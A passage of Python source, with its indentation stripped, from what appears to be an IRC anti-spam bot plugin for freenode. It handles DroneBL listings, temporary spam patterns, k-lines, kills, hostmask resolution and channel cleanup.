"""<ip> [,<ip>]
add <ips> on dronebl, hostmasks can be provided"""
for ip in ips:
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),"Unknown spambot or drone"))
t.setDaemon(True)
t.start()
else:
prefix = "*!*@%s" % ip
if ircutils.isUserHostmask(prefix):
t = world.SupyThread(target=self.resolve,name=format('resolve %s', prefix),args=(irc,prefix,'',True,"Unknown spambot or drone"))
t.setDaemon(True)
t.start()
irc.replySuccess()
dnsblresolve = wrap(dnsblresolve,['owner',commalist('something')])
def dnsbl (self,irc,msg,args,ips,comment):
"""<ip> [,<ip>] [<comment>]
add <ips> on dronebl, <comment> can be used to change type (Bottler|Unknown spambot or drone|DDOS Drone|SOCKS Proxy|HTTP Proxy|ProxyChain|Web Page Proxy|Open DNS Resolver|Brute force attackers|Open Wingate Proxy|Compromised router / gateway|Autorooting worms)"""
for ip in ips:
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),comment))
t.setDaemon(True)
t.start()
irc.replySuccess()
dnsbl = wrap(dnsbl,['owner',commalist('ip'),rest('text')])
def rmdnsbl (self,irc,msg,args,ips):
"""<ip> [<ip>]
remove <ips> from dronebl"""
for ip in ips:
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
self.rmrequestors[ip] = msg.nick
t = world.SupyThread(target=self.removeDnsbl,name=format('rmDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey')))
t.setDaemon(True)
t.start()
irc.replySuccess()
rmdnsbl = wrap(rmdnsbl,['owner',many('ip')])
def addtmp (self,irc,msg,args,channel,text):
"""[<channel>] <message>
add a string in channel's temporary patterns"""
text = text.lower()
i = self.getIrc(irc)
if channel in i.channels:
chan = self.getChan(irc,channel)
shareID = self.registryValue('shareComputedPatternID',channel=channel)
if shareID == -1 or not i.defcon:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text)
self.logChannel(irc,'PATTERN: [%s] added tmp "%s" for %ss by %s' % (channel,text,life,msg.nick))
irc.replySuccess()
else:
n = 0
l = self.registryValue('computedPatternLife',channel=channel)
for channel in i.channels:
chan = self.getChan(irc,channel)
id = self.registryValue('shareComputedPatternID',channel=channel)
if id == shareID:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text)
n = n + 1
self.logChannel(irc,'PATTERN: added tmp "%s" for %ss by %s in %s channels' % (text,l,msg.nick,n))
irc.replySuccess()
else:
irc.reply('unknown channel')
addtmp = wrap(addtmp,['op','text'])
def addglobaltmp (self,irc,msg,args,text):
"""<text>
add <text> to temporary patterns in all channels"""
text = text.lower()
i = self.getIrc(irc)
n = 0
for channel in i.channels:
chan = self.getChan(irc,channel)
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text)
n = n + 1
self.logChannel(irc,'PATTERN: added tmp "%s" for %ss by %s in %s channels' % (text,life,msg.nick,n))
irc.replySuccess()
addglobaltmp = wrap(addglobaltmp,['owner','text'])
def rmtmp (self,irc,msg,args,channel):
"""[<channel>]
remove temporary patterns for given channel"""
i = self.getIrc(irc)
if channel in i.channels:
chan = self.getChan(irc,channel)
shareID = self.registryValue('shareComputedPatternID',channel=channel)
if shareID != -1:
n = 0
for channel in i.channels:
id = self.registryValue('shareComputedPatternID',channel=channel)
if id == shareID:
if i.channels[channel].patterns:
i.channels[channel].patterns.reset()
n = n + 1
self.logChannel(irc,'PATTERN: removed tmp patterns in %s channels by %s' % (n,msg.nick))
elif chan.patterns:
l = len(chan.patterns)
chan.patterns.reset()
if l:
self.logChannel(irc,'PATTERN: [%s] removed %s tmp pattern by %s' % (channel,l,msg.nick))
irc.replySuccess()
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('[%s] no active pattern' % channel)
else:
irc.reply('unknown channel')
rmtmp = wrap(rmtmp,['op'])
def unkline (self,irc,msg,args,nick):
"""<nick>
request unkline of <nick>, klined recently from your channel
"""
channels = []
ops = []
nick = nick.lower()
for channel in irc.state.channels:
if msg.nick in irc.state.channels[channel].ops:
chan = self.getChan(irc,channel)
if len(chan.klines):
for q in chan.klines:
self.log.info('klines found %s' % q)
if q.startswith(nick):
ip = q.split(' ')[1]
channels.append(channel)
if not isCloaked('%s!%s' % (nick,ip),self):
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL DEL %s' % ip))
else:
irc.queueMsg(ircmsgs.IrcMsg('UNKLINE %s' % ip))
if self.registryValue('clearTmpPatternOnUnkline',channel=channel):
if chan.patterns and len(chan.patterns):
self.logChannel(irc,'PATTERN: [%s] removed %s tmp pattern by %s' % (channel,len(chan.patterns),msg.nick))
chan.patterns.reset()
self.logChannel(irc,'OP: [%s] %s unklined %s (%s)' % (channel,msg.nick,ip,nick))
irc.reply('The ban on %s from %s has been lifted' % (nick,channel))
else:
self.logChannel(irc,'OP: [%s] %s asked for removal of %s (%s)' % (channel,msg.nick,ip,nick))
irc.reply(self.registryValue('msgInviteConfirm'))
ops.append(channel)
if len(ops):
if not len(channels):
irc.replyError("'%s' does not match any recent bans from %s" % (nick,', '.join(ops)))
else:
irc.replyError("Only **Opped** channel operators of the channel the ban originated in can remove k-lines. If you have any questions, contact freenode staff (#freenode-sigyn)")
unkline = wrap(unkline,['private','text'])
def oper (self,irc,msg,args):
"""takes no arguments
ask bot to oper"""
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.sendMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
irc.replySuccess()
else:
irc.replyError('operatorNick or operatorPassword is empty')
oper = wrap(oper,['owner'])
def undline (self,irc,msg,args,txt):
"""<ip>
undline an ip
"""
irc.queueMsg(ircmsgs.IrcMsg('UNDLINE %s on *' % txt))
irc.replySuccess()
undline = wrap(undline,['owner','ip'])
def checkresolve (self,irc,msg,args,txt):
"""<nick!ident@hostmask>
returns computed hostmask"""
irc.reply(self.prefixToMask(irc,txt))
checkresolve = wrap(checkresolve,['owner','hostmask'])
# internal stuff
def applyDefcon (self, irc):
i = self.getIrc(irc)
for channel in irc.state.channels:
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel):
chan = self.getChan(irc,channel)
if i.defcon or chan.called:
if not 'z' in irc.state.channels[channel].modes:
if irc.nick in list(irc.state.channels[channel].ops):
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +qz $~a' % channel))
else:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +oqz %s $~a' % (channel,irc.nick)))
def _ip_ranges (self, h):
if '/' in h:
# we've got a cloak
parts = h.split('/')
if parts[0] == 'gateway' and parts[-1].startswith('ip.'):
# we've got a dehexed gateway IP cloak
h = parts[-1].split('.', 1)[1]
else:
return [h]
if utils.net.isIPV4(h):
prefixes = [27, 26, 25, 24]
elif utils.net.bruteIsIPV6(h):
# noteworthy IPv6 allocation information
# - linode assigns a /128 by default. can also offer /56, /64 & /116
# - xfinity (comcast) has been reported as offering /60
# - hurricane electric tunnel brokers get a /48
prefixes = [120, 118, 116, 114, 112, 110, 64, 60, 56, 48]
else:
return [h]
ranges = []
for prefix in prefixes:
range = ipaddress.ip_network('%s/%d' % (h, prefix), strict=False).with_prefixlen
ranges.append(range)
return ranges
def resolve (self,irc,prefix,channel='',dnsbl=False,comment=False):
(nick,ident,host) = ircutils.splitHostmask(prefix)
if ident.startswith('~'):
ident = '*'
if prefix in self.cache:
return self.cache[prefix]
try:
resolver = dns.resolver.Resolver()
resolver.timeout = self.registryValue('resolverTimeout')
resolver.lifetime = self.registryValue('resolverTimeout')
L = []
ips = None
try:
ips = resolver.query(host,'AAAA')
except:
ips = None
if ips:
for ip in ips:
if not str(ip) in L:
L.append(str(ip))
try:
ips = resolver.query(host,'A')
except:
ips = None
if ips:
for ip in ips:
if not str(ip) in L:
L.append(str(ip))
#self.log.debug('%s resolved as %s' % (prefix,L))
if len(L) == 1:
h = L[0]
#self.log.debug('%s is resolved as %s@%s' % (prefix,ident,h))
if dnsbl:
if utils.net.isIPV4(h) or utils.net.bruteIsIPV6(h):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', h),args=(irc,h,self.registryValue('droneblHost'),self.registryValue('droneblKey'),comment))
t.setDaemon(True)
t.start()
if prefix in i.resolving:
del i.resolving[prefix]
return
self.cache[prefix] = '%s@%s' % (ident,h)
else:
self.cache[prefix] = '%s@%s' % (ident,host)
except:
self.cache[prefix] = '%s@%s' % (ident,host)
i = self.getIrc(irc)
if channel and channel in irc.state.channels:
chan = self.getChan(irc,channel)
if nick in irc.state.channels[channel].users:
if nick in chan.nicks:
chan.nicks[nick][2] = self.cache[prefix]
if prefix in i.resolving:
del i.resolving[prefix]
def prefixToMask (self,irc,prefix,channel='',dnsbl=False,comment=None):
if prefix in self.cache:
return self.cache[prefix]
prefix = prefix
(nick,ident,host) = ircutils.splitHostmask(prefix)
if '/' in host:
if host.startswith('gateway/web/freenode'):
if 'ip.' in host:
self.cache[prefix] = '*@%s' % host.split('ip.')[1]
else:
# syn offline / busy
self.cache[prefix] = '%s@gateway/web/freenode/*' % ident
elif host.startswith('gateway/tor-sasl'):
self.cache[prefix] = '*@%s' % host
elif host.startswith('gateway/vpn') or host.startswith('nat/'):
if ident.startswith('~'):
ident = '*'
if '/x-' in host:
host = host.split('/x-')[0] + '/*'
self.cache[prefix] = '%s@%s' % (ident,host)
elif host.startswith('gateway'):
h = host.split('/')
if 'ip.' in host:
ident = '*'
h = host.split('ip.')[1]
elif '/vpn/' in host:
if '/x-' in host:
h = h[:3]
h = '%s/*' % '/'.join(h)
else:
h = host
if ident.startswith('~'):
ident = '*'
elif len(h) > 3:
h = h[:3]
h = '%s/*' % '/'.join(h)
else:
h = host
self.cache[prefix] = '%s@%s' % (ident,h)
else:
if ident.startswith('~'):
ident = '*'
self.cache[prefix] = '%s@%s' % (ident,host)
else:
if ident.startswith('~'):
ident = '*'
if utils.net.isIPV4(host):
self.cache[prefix] = '%s@%s' % (ident,host)
elif utils.net.bruteIsIPV6(host):
self.cache[prefix] = '%s@%s' % (ident,host)
else:
i = self.getIrc(irc)
if self.registryValue('useWhoWas'):
self.cache[prefix] = '%s@%s' % (ident,host)
elif not prefix in i.resolving:
i.resolving[prefix] = True
t = world.SupyThread(target=self.resolve,name=format('resolve %s', prefix),args=(irc,prefix,channel,dnsbl,comment))
t.setDaemon(True)
t.start()
return '%s@%s' % (ident,host)
if prefix in self.cache:
return self.cache[prefix]
else:
if ident.startswith('~'):
ident = '*'
return '%s@%s' % (ident,host)
def do352 (self,irc,msg):
# RPL_WHOREPLY
channel = msg.args[1]
(nick, ident, host) = (msg.args[5], msg.args[2], msg.args[3])
if irc.isChannel(channel):
chan = self.getChan(irc,channel)
t = time.time()
prefix = '%s!%s@%s' % (nick,ident,host)
mask = self.prefixToMask(irc,prefix,channel)
if isCloaked(prefix,self):
t = t - self.registryValue('ignoreDuration',channel=channel) - 1
chan.nicks[nick] = [t,prefix,mask,'','']
def spam (self,irc,msg,args,channel):
"""<channel>
trusted users can ask the bot to join <channel> for a limited period of time
"""
if not channel in irc.state.channels:
t = time.time() - (self.registryValue('leaveChannelIfNoActivity',channel=channel) * 24 * 3600) + 3600
self.setRegistryValue('lastActionTaken',t,channel=channel)
irc.sendMsg(ircmsgs.join(channel))
chan = self.getChan(irc,channel)
chan.requestedBySpam = True
self.logChannel(irc,"JOIN: [%s] due to %s (trusted)" % (channel,msg.prefix))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
irc.replySuccess()
spam = wrap(spam,[('checkCapability','trusted'),'channel'])
def unstaffed (self,irc,msg,args):
"""
returns monitored channels without staffers
"""
channels = []
for channel in irc.state.channels:
found = False
for nick in list(irc.state.channels[channel].users):
try:
hostmask = irc.state.nickToHostmask(nick)
if ircutils.isUserHostmask(hostmask) and self.registryValue('staffCloak') in hostmask:
found = True
break
except:
continue
if not found:
channels.append(channel)
irc.reply('%s channels: %s' %(len(channels),', '.join(channels)))
unstaffed = wrap(unstaffed,['owner'])
def list (self,irc,msg,args):
"""
returns list of monitored channels with their users count and * if leaveChannelIfNoActivity is -1
"""
channels = []
for channel in list(irc.state.channels):
flag = ''
if self.registryValue('leaveChannelIfNoActivity',channel=channel) == -1:
flag = '*'
l = len(irc.state.channels[channel].users)
if not channel == self.registryValue('secretChannel') and not channel == self.registryValue('snoopChannel') and not channel == self.registryValue('reportChannel') and not channel == self.registryValue('logChannel'):
channels.append((l,flag,channel))
def getKey(item):
return item[0]
chs = sorted(channels,key=getKey,reverse=True)
channels = []
for c in chs:
(l,flag,channel) = c
channels.append('%s %s(%s)' % (channel,flag,l))
irc.reply('%s channels: %s' %(len(channels),', '.join(channels)))
list = wrap(list,['owner'])
def do001 (self,irc,msg):
i = self.getIrc(irc)
if not i.opered:
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.queueMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
def do381 (self,irc,msg):
i = self.getIrc(irc)
if not i.opered:
i.opered = True
irc.queueMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
irc.queueMsg(ircmsgs.IrcMsg('MODE %s +s +Fbnfl' % irc.nick))
try:
conf.supybot.protocols.irc.throttleTime.setValue(0.0)
except:
t = True
def doMode (self,irc,msg):
target = msg.args[0]
if target == irc.nick:
i = self.getIrc(irc)
modes = ircutils.separateModes(msg.args[1:])
for change in modes:
(mode,value) = change
if mode == '-o':
i.opered = False
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.queueMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
elif mode == '+p':
i.god = True
self.log.debug('%s is switching to god' % irc.nick)
self.applyDefcon(irc)
elif mode == '-p':
i.god = False
self.log.debug('%s is switching to mortal' % irc.nick)
elif target in irc.state.channels and 'm' in irc.state.channels[target].modes:
modes = ircutils.separateModes(msg.args[1:])
for change in modes:
(mode,value) = change
if mode == '+v':
chan = self.getChan(irc,target)
if value in chan.nicks:
a = chan.nicks[value]
if len(a) == 5:
chan.nicks[msg.nick] = [time.time(),a[1],a[2],a[3],a[4]]
else:
chan.nicks[msg.nick] = [time.time(),a[1],a[2],'','']
elif target in irc.state.channels:
modes = ircutils.separateModes(msg.args[1:])
for change in modes:
(mode,value) = change
if mode == '+z':
if not irc.nick in list(irc.state.channels[target].ops):
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG ChanServ :OP %s' % target))
if target == self.registryValue('mainChannel'):
self.opStaffers(irc)
elif mode == '+b' or mode == '+q':
if ircutils.isUserHostmask(value):
mask = self.prefixToMask(irc,value)
ip = mask.split('@')[1]
permit = self.registryValue('banPermit')
if permit > -1:
ipranges = self._ip_ranges(ip)
announced = False
for range in ipranges:
range = range
q = self.getIrcQueueFor(irc,'ban-check',range,self.registryValue('banLife'))
q.enqueue(target)
if len(q) > permit:
chs = []
for m in q:
chs.append(m)
q.reset()
if not announced:
announced = True
self.logChannel(irc,"INFO: *@%s is collecting bans (%s/%ss) %s" % (range, permit, self.registryValue('banLife'), ','.join(chs)))
permit = permit + 1
def opStaffers (self,irc):
ops = []
if self.registryValue('mainChannel') in irc.state.channels and irc.nick in list(irc.state.channels[self.registryValue('mainChannel')].ops):
for nick in list(irc.state.channels[self.registryValue('mainChannel')].users):
if not nick in list(irc.state.channels[self.registryValue('mainChannel')].ops):
try:
mask = irc.state.nickToHostmask(nick)
if mask and self.registryValue('staffCloak') in mask:
ops.append(nick)
except:
continue
if len(ops):
for i in range(0, len(ops), 4):
irc.sendMsg(ircmsgs.ops(self.registryValue('mainChannel'),ops[i:i+4],irc.prefix))
def getIrc (self,irc):
if not irc.network in self._ircs:
self._ircs[irc.network] = Ircd(irc)
self._ircs[irc.network].restore(self.getDb(irc.network))
if len(self.registryValue('operatorNick')) and len(self.registryValue('operatorPassword')):
irc.queueMsg(ircmsgs.IrcMsg('OPER %s %s' % (self.registryValue('operatorNick'),self.registryValue('operatorPassword'))))
return self._ircs[irc.network]
def doAccount (self,irc,msg):
i = self.getIrc(irc)
if ircutils.isUserHostmask(msg.prefix):
nick = ircutils.nickFromHostmask(msg.prefix)
acc = msg.args[0]
if acc == '*':
acc = None
else:
aa = acc.lower()
for u in i.klinednicks:
if aa == u:
self.logChannel(irc,"SERVICE: %s (%s) lethal account (account-notify)" % (msg.prefix,acc))
src = msg.nick
i.klinednicks.enqueue(aa)
if not src in i.tokline:
i.toklineresults[src] = {}
i.toklineresults[src]['kind'] = 'evade'
i.tokline[src] = src
def f ():
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
schedule.addEvent(f,time.time()+random.randint(0,7))
#irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
break
for channel in irc.state.channels:
if irc.isChannel(channel):
chan = self.getChan(irc,channel)
if nick in chan.nicks:
a = chan.nicks[msg.nick]
if len(a) == 5:
chan.nicks[msg.nick] = [a[0],a[1],a[2],a[3],acc]
else:
chan.nicks[msg.nick] = [a[0],a[1],a[2],'',acc]
def getChan (self,irc,channel):
i = self.getIrc(irc)
if not channel in i.channels and irc.isChannel(channel):
i.channels[channel] = Chan(channel)
if not self.starting:
irc.queueMsg(ircmsgs.who(channel))
return i.channels[channel]
def kill (self,irc,nick,reason=None):
i = self.getIrc(irc)
if i.defcon:
i.defcon = time.time()
if not self.registryValue('enable'):
self.logChannel(irc,"INFO: disabled, can't kill %s" % nick)
return
if not i.opered:
self.logChannel(irc,"INFO: not opered, can't kill %s" % nick)
return
if not reason:
reason = self.registryValue('killMessage')
irc.sendMsg(ircmsgs.IrcMsg('KILL %s :%s' % (nick,reason)))
def do338 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[0] == irc.nick and msg.args[1] in i.whowas:
pending = i.whowas[msg.args[1]]
del i.whowas[msg.args[1]]
(nick,ident,host) = ircutils.splitHostmask(pending[0])
# [prefix,mask,duration,reason,klineMessage]
ident = pending[1].split('@')[0]
h = msg.args[2]
if h == '255.255.255.255':
h = host
mask = self.prefixToMask(irc,'%s!%s@%s' % (nick,ident,h))
if not self.registryValue('enable'):
self.logChannel(irc,"INFO: disabled, can't kline %s (%s)" % (mask,pending[3]))
if pending[1] in i.klines:
del i.klines[pending[1]]
return
if not i.opered:
self.logChannel(irc,"INFO: not opered, can't kline %s (%s)" % (mask,pending[3]))
if pending[1] in i.klines:
del i.klines[pending[1]]
return
self.log.info('KLINE %s|%s' % (mask,pending[3]))
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL ADD %s !T %s %s | %s' % (mask,pending[2],pending[4],pending[3])))
else:
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s %s :%s|%s' % (pending[2],mask,pending[4],pending[3])))
nickLowered = nick.lower()
for channel in irc.state.channels:
chan = self.getChan(irc,channel)
if len(chan.klines):
index = 0
for k in chan.klines:
if k.startswith(nickLowered):
(at, m) = chan.klines.queue[index]
chan.klines.queue[index] = (at,'%s %s' % (nickLowered,mask))
self.log.info('kline %s replaced at %s: %s / %s' % (m,index,nickLowered,mask))
break
index = index + 1
if pending[1] in i.klines:
del i.klines[pending[1]]
def kline (self,irc,prefix,mask,duration,reason,klineMessage=None):
i = self.getIrc(irc)
if mask in i.klines:
return
if duration < 0:
self.log.info('Ignored kline %s due to no duration', mask)
return
if not klineMessage:
klineMessage = self.registryValue('klineMessage')
if '"' in klineMessage:
klineMessage = self.registryValue('klineMessage')
canKline = True
i.klines[mask] = mask
if "bc.googleusercontent.com" in prefix:
reason = reason + ' !dnsbl Unknown spambot or drone'
if ircutils.isUserHostmask(prefix):
canKline = not self.registryValue('useWhoWas')
if i.defcon or 'gateway/' in prefix:
canKline = True
elif '/' in prefix:
canKline = False
else:
self.log.info('INVALID PREFIX %s : %s : %s' % (prefix,mask,reason))
self.log.info('CANKLINE %s %s %s' % (prefix,mask,canKline))
if canKline:
if not self.registryValue('enable'):
self.logChannel(irc,"INFO: disabled, can't kline %s (%s)" % (mask,reason))
else:
self.log.info('KLINE %s|%s' % (mask,reason))
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL ADD %s !T %s %s | %s' % (mask,duration,klineMessage,reason)))
else:
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s %s :%s|%s' % (duration,mask,klineMessage,reason)))
if i.defcon:
i.defcon = time.time()
elif ircutils.isUserHostmask(prefix):
(nick,ident,host) = ircutils.splitHostmask(prefix)
self.log.info('whowas for %s | %s | %s' % (prefix,mask,reason))
if not nick in i.whowas:
i.whowas[nick] = [prefix,mask,duration,reason,klineMessage]
irc.sendMsg(ircmsgs.IrcMsg('WHOWAS %s' % nick))
def forgetKline ():
i = self.getIrc(irc)
if mask in i.klines:
del i.klines[mask]
schedule.addEvent(forgetKline,time.time()+7)
def ban (self,irc,nick,prefix,mask,duration,reason,message,log,killReason=None):
self.kill(irc,nick,killReason)
self.kline(irc,prefix,mask,duration,reason,message)
self.logChannel(irc,log)
def getIrcQueueFor (self,irc,key,kind,life):
i = self.getIrc(irc)
if not key in i.queues:
i.queues[key] = {}
if not kind in i.queues[key]:
i.queues[key][kind] = utils.structures.TimeoutQueue(life)
elif i.queues[key][kind].timeout != life:
i.queues[key][kind].setTimeout(life)
return i.queues[key][kind]
def rmIrcQueueFor (self,irc,key):
i = self.getIrc(irc)
if key in i.queues:
for k in i.queues[key]:
if type(i.queues[key][k]) == utils.structures.TimeoutQueue:
i.queues[key][k].reset()
i.queues[key][k].queue = None
i.queues[key].clear()
del i.queues[key]
def do015 (self,irc,msg):
try:
(targets,text) = msg.args
i = self.getIrc(irc)
reg = r".*-\s+([a-z]+\.freenode\.net)\[.*Users:\s+(\d{2,6})\s+"
result = re.match(reg,text)
# here we store server name and users count, and we will ping the server with the most users
if result:
i.servers[result.group(1)] = int(result.group(2))
except:
pass
def do017 (self,irc,msg):
found = None
users = None
i = self.getIrc(irc)
for server in i.servers:
if not users or users < i.servers[server]:
found = server
users = i.servers[server]
server = None
if found:
i.servers = {}
server = '%s' % found
i.servers[server] = time.time()
def bye():
i = self.getIrc(irc)
if server in i.servers:
del i.servers[server]
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss due to %s/%ss of lags with %s : some abuses are ignored' % (self.registryValue('netsplitDuration'),self.registryValue('lagPermit'),self.registryValue('lagPermit'),server))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
schedule.addEvent(bye,time.time()+self.registryValue('lagPermit'))
irc.queueMsg(ircmsgs.IrcMsg('TIME %s' % server))
def resync (self,irc,msg,args):
"""in case of plugin being reloaded
call this to recompute user to ignore (ignoreDuration)"""
for channel in irc.state.channels:
irc.queueMsg(ircmsgs.who(channel))
irc.replySuccess()
resync = wrap(resync,['owner'])
def lethalaccount (self,irc,msg,args,text):
"""<accountname> monitor account and kline it on sight
during 24h, via extended-join, account-notify, account's name change"""
i = self.getIrc(irc)
account = text.lower().strip()
i.klinednicks.enqueue(account)
self.logChannel(irc,'SERVICE: %s lethaled for 24h by %s' % (account, msg.nick))
for channel in irc.state.channels:
if irc.isChannel(channel):
c = self.getChan(irc,channel)
for u in list(irc.state.channels[channel].users):
if u in c.nicks:
if len(c.nicks[u]) > 4:
if c.nicks[u][4] and c.nicks[u][4].lower() == account:
self.ban(irc,u,c.nicks[u][1],c.nicks[u][2],self.registryValue('klineDuration'),'Lethaled account %s' % account,self.registryValue('klineMessage'),'BAD: %s (lethaled account %s)' % (account,c.nicks[u][1]),self.registryValue('killMessage'))
irc.replySuccess()
lethalaccount = wrap(lethalaccount,['owner','text'])
def cleanup (self,irc):
i = self.getIrc(irc)
partReason = 'Leaving the channel. /invite %s %s again if needed'
for channel in irc.state.channels:
if irc.isChannel(channel) and not channel in self.registryValue('mainChannel') and not channel == self.registryValue('snoopChannel') and not channel == self.registryValue('logChannel') and not channel == self.registryValue('reportChannel') and not channel == self.registryValue('secretChannel'):
if self.registryValue('lastActionTaken',channel=channel) > 1.0 and self.registryValue('leaveChannelIfNoActivity',channel=channel) > -1 and not i.defcon:
if time.time() - self.registryValue('lastActionTaken',channel=channel) > (self.registryValue('leaveChannelIfNoActivity',channel=channel) * 24 * 3600):
irc.queueMsg(ircmsgs.part(channel, partReason % (irc.nick,channel)))
chan = self.getChan(irc,channel)
if chan.requestedBySpam:
self.setRegistryValue('lastActionTaken',self.registryValue('lastActionTaken'),channel=channel)
else:
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
self.logChannel(irc,'PART: [%s] due to inactivity for %s days' % (channel,self.registryValue('leaveChannelIfNoActivity',channel=channel)))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().remove(channel)
except KeyError:
pass
kinds = []
for kind in i.queues:
count = 0
ks = []
try:
for k in i.queues[kind]:
if isinstance(i.queues[kind][k],utils.structures.TimeoutQueue):
if not len(i.queues[kind][k]):
ks.append(k)
else:
count += 1
else:
count += 1
except:
self.log.error('Exception with %s' % kind)
if len(ks):
for k in ks:
del i.queues[kind][k]
if count == 0:
kinds.append(kind)
for kind in kinds:
del i.queues[kind]
chs = []
for channel in i.channels:
chan = i.channels[channel]
ns = []
for n in chan.nicks:
if channel in irc.state.channels:
if not n in irc.state.channels[channel].users:
ns.append(n)
else:
ns.append(n)
for n in ns:
del chan.nicks[n]
bs = []
for b in chan.buffers:
qs = []
count = 0
for q in chan.buffers[b]:
if isinstance(chan.buffers[b][q],utils.structures.TimeoutQueue):
if not len(chan.buffers[b][q]):
qs.append(q)
else:
count += 1
else:
count +=1
for q in qs:
del chan.buffers[b][q]
if count == 0:
bs.append(b)
for b in bs:
del chan.buffers[b]
logs = []
if chan.logs:
for log in chan.logs:
if not len(chan.logs[log]):
logs.append(log)
for log in logs:
del chan.logs[log]
if len(ns) or len(bs) or len(logs):
chs.append('[%s : %s nicks, %s buffers, %s logs]' % (channel,len(ns),len(bs),len(logs)))
def do391 (self,irc,msg):
i = self.getIrc(irc)
if msg.prefix in i.servers:
delay = time.time()-i.servers[msg.prefix]
del i.servers[msg.prefix]
if delay > self.registryValue('lagPermit'):
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss due to %s/%ss of lags with %s : some abuses are ignored' % (self.registryValue('netsplitDuration'),delay,self.registryValue('lagPermit'),msg.prefix))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
def do219 (self,irc,msg):
i = self.getIrc(irc)
r = []
for k in i.stats:
if i.stats[k] > self.registryValue('ghostPermit'):
r.append(k.replace('[unknown@','').replace(']',''))
for ip in r:
irc.sendMsg(ircmsgs.IrcMsg('DLINE %s %s on * :%s' % (1440,ip,self.registryValue('msgTooManyGhost'))))
i.stats = {}
if len(r):
self.logChannel(irc,'DOS: %s ip(s) %s' % (len(r),', '.join(r)))
if len(i.dlines):
for l in i.dlines:
found = False
for ip in i.ilines:
if l in ip:
found = True
break
if not found:
self.log.info('DLINE %s|%s' % (l,self.registryValue('saslDuration')))
irc.sendMsg(ircmsgs.IrcMsg('DLINE %s %s on * :%s' % (self.registryValue('saslDuration'),l,self.registryValue('saslMessage'))))
i.dlines = []
i.ilines = {}
def do311 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.mx:
ident = msg.args[2]
hostmask = '%s!%s@%s' % (nick,ident,msg.args[3])
email = i.mx[nick][0]
badmail = i.mx[nick][1]
mx = i.mx[nick][2]
freeze = i.mx[nick][3]
del i.mx[nick]
mask = self.prefixToMask(irc,hostmask)
self.logChannel(irc,'SERVICE: %s registered %s with *@%s is in mxbl (%s)' % (hostmask,nick,email,mx))
if badmail and len(email) and len(nick):
if not freeze:
irc.queueMsg(ircmsgs.notice(nick,'Your account has been dropped, please register it again with a valid email address (no disposable temporary email)'))
elif nick in i.tokline:
if not nick in i.toklineresults:
i.toklineresults[nick] = {}
ident = msg.args[2]
hostmask = '%s!%s@%s' % (nick,ident,msg.args[3])
mask = self.prefixToMask(irc,hostmask)
gecos = msg.args[5]
i.toklineresults[nick]['hostmask'] = hostmask
i.toklineresults[nick]['mask'] = mask
i.toklineresults[nick]['gecos'] = gecos
def do317 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.tokline:
if not nick in i.toklineresults:
i.toklineresults[nick] = {}
i.toklineresults[nick]['signon'] = float(msg.args[3])
def do330 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.tokline:
if not nick in i.toklineresults:
i.toklineresults[nick] = {}
i.toklineresults[nick]['account'] = True
def do318 (self,irc,msg):
i = self.getIrc(irc)
nick = msg.args[1]
if nick in i.toklineresults:
if i.toklineresults[nick]['kind'] == 'evade':
uid = random.randint(0,1000000)
